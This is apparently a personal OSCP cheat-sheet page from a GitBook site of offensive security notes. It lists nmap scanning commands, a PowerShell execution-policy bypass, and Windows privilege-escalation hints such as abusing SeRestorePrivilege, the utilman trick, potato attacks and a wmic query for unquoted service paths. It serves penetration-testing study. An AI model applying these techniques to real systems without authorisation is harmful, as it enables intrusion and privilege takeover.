Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  • Enumeration
  • Windows
  • Post Exploit
  • Windows

OSCP Checklist

This is just a cheat sheet of sorts for myself.

NextPrivilege Escalation Windows

Last updated 3 years ago

Enumeration

  • sudo nmap $target

  • sudo nmap -sV -sV -p- $target

  • sudo nmap --script vuln -p $target to check vulnerabilities on open services

  • check HTML comments, especially on login or registration pages

  • windows machine: powershell -ep bypass

Windows

  • sudo nmap -Pn --script vuln vault.offsec

Post Exploit

Windows

  • whoami /priv

  • if SeRestorePrivilege listed then

    • Run to enable this privilege to our PowerShell session. We now have write access to C:\Windows\System32.

  • if access to RDP and C:\Windows\System32 then you an do the utilman exploit.

  • Check the page.

Check Existing Privileges

  • whoami /priv

    • if SeImpersonatePrivilege you may try juicy potato, or rogue potato (newer, but requires smb to be listening)

Check Unquoted Service Paths

wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

EnableSeRestorePrivilege.ps1
windows privilege escalation
Page cover image